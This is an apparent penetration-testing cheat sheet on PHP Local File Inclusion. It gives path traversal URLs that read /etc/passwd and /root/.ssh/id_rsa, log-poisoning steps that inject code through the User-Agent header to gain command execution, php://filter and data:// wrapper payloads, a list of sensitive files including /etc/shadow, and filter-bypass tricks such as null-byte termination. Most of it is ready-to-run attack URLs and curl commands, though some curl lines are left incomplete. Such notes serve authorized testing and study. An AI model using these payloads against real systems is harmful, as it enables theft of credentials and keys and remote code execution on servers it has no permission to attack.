# Local File Inclusion To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed. * [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/) ## PHP Functions * Functions provoking an LFI ```php include() require() include_once () require_once() ``` ## Usage * Exploit URL parameter by including other files. ``` http://example.com/home?page=about.html http://example.com/home?page=/etc/passwd ``` * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks) ``` http://example.com/home?page=../../../../etc/passwd ``` or ``` http://example.com/home?page=html/../../../home//.ssh/id_rsa ``` ### Log Poisoning * Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce. * `www-data` needs read & write permisson in order to do so. * Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows ```sh curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ' -H 'User-Agent: Mozilla/5.0 Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1' ``` * Follow up with a request to ```HTTP curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' ``` ### /proc/self/fd * [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2) * Log poisoning and opening logfile via `/proc/self/fd/xx`. ## Files of Interest * `/etc/issue` * `/etc/profile` * `/proc/version` * `/etc/passwd` * `/etc/shadow` * `/etc/group` * `/etc/motd` * `/etc/mysql/my.cnf` * `/root/.bash_history` * `/var/log/dmessage` * `/var/mail/root` * `/root/.ssh/id_rsa` * `/var/log/apache2/access.log` * `C:\boot.ini` * `/proc/self/fd/xx` * `/proc/version` * `/proc/cmdline` * `/proc/[0-9]*/fd/[0-9]*` * `sess_` if the location of the session file is known. Some paths are ```sh c:\Windows\Temp /tmp/ /var/lib/php5 /var/lib/php/session ``` ### Base64 Encoding via PHP * Circumvent filter via encoding local files included ins a GET parameter value * __Read PHP files through encoding them, so they won't be executed__ ```http curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd ``` * Use encoded data as input through the parameter ```sh curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo= ``` ## Tricks * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4 * Terminate query with `/.` * `..//..//..//file`, double slashes * URL encode path